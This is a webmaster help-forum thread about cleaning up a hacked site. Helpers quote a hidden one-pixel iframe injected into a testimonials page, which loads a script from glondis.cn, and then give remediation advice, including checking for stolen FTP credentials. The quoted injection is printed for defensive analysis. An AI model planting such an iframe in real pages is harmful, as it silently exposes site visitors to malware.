The following is located at the bottom of the page and is visible through Web-sniffer.net. Other pages are affected as well.
www .thissenceilingdesign .com/testimonials1 .htm
< if ram e frameborder=0 border=0 height=1 width=1 src =“http ://glondis .cn /in. cgi?3” />
Dasient also flagged the following as suspected malicious code, but someone else will have to take a look to try to determine why.
www .thissenceilingdesign .com/sidebar .js
How are you viewing your files? You should be checking the versions that are on the server and not your local computer.
You may find the following resources helpful.
Resources:
Tips for Cleaning & Securing your Website
How to remove the ‘This site may harm your computer’
Google Webmaster Tools
Google MalwareFAQ and screenshot for ‘Request a Review’
Hello :-),
Jaal Scan ID # 823034-157 output
Malicious code detected on line 310 of http://www.thissenceilingdesign.com/testimonials1.htmstarts with
<!—iframe frameborder=0 border=0 height=1 width=1 src="http://glondis.cn/in.cgi?>
Please look at the copy of the page on the server, if you cannot locate this code, it is probably being injected at runtime, when a user is requesting the page. It might be useful to then wipe out the hosting directory and check for malware, on the server and in the backend database. You can also ask for help from your hosting provider. Please check out other pages too.
If you have any specific issues feel free to ask for help.
Also, I am collecting info from people affected by attacks like this, if it would be possible for you to share your experience, could you kindly shoot me a mail at a.banerje e @ s top the hac ker .com (please remove the spaces).
We also provide vulnerability identification and mitigation services to help websites from being infected in the first place.
Hope this helps,
-A
Dr. Anirban Banerjee,
Jaal LLC, Riverside, CA.
www.stopthehacker.com
Jaal: Protecting the Internet, one website at a time™
EDIT: apologies for the duplicate :-)
Anirban … can you shed any light on why Dasient identified the javascript file as “suspected?”
http://wam.dasient.com/wam/diagnose?URL=www.thissenceilingdesign.com&scan_id=18993
Edit: Anirban … I’m going to take a nap now … I’ll stay out of your way. :-D
@Kaleh
Probably a false positive or because it references another page which has the iframe embedded in it. :-) The code does not seem to be malicious outright.
Hope this helped,
-A
PS: you sleep! no way.. judging by your activity on this group alone. Its good to have a strong active community.
Ok…I wiped out all the data on the server, uploaded my backup but still get the sidebar.js as detected, the other infections are gone…any idea?
I have 3 root folders for my 3 websites on a server, do I only need to wipe out the affected website folder or everything?
You may not need to wipe out everything. However, it would be prudent to understand what let this injection happen. In quite a lot of cases I have worked on, people think that wiping out directories works..and then they get hit a day later.
What do you mean when you say “the code is not visible”? Have you searched the html on the server?
-A
@wthissen
The sidebar.js was only listed as “suspected” instead of “known.” If a scanning tool identifies something as suspicious, you just dig a little deeper to make a judgement call as to whether it is a real issue or not.
You might want to ignore the javascript file for now and go ahead and “Request a Review” through Webmaster Tools (previously referenced.)
In addition to reviewing the other documents and discussing with your web-host how this may have happened, you may want to scan your local PC for infection. A number of the more recent web-site infections are the result of malware on the local PC capturing FTP credentials. Others have reported that [ AVG, Avira OR Avast ] along with [ Malwarebytes Anti-malware ] often detect and remove such malware. Some of the other tried and true anti-virus products are not detecting the problem on the local computer. So … check your PC and change your passwords, just in case stolen credentials are the cause of the web-site hack.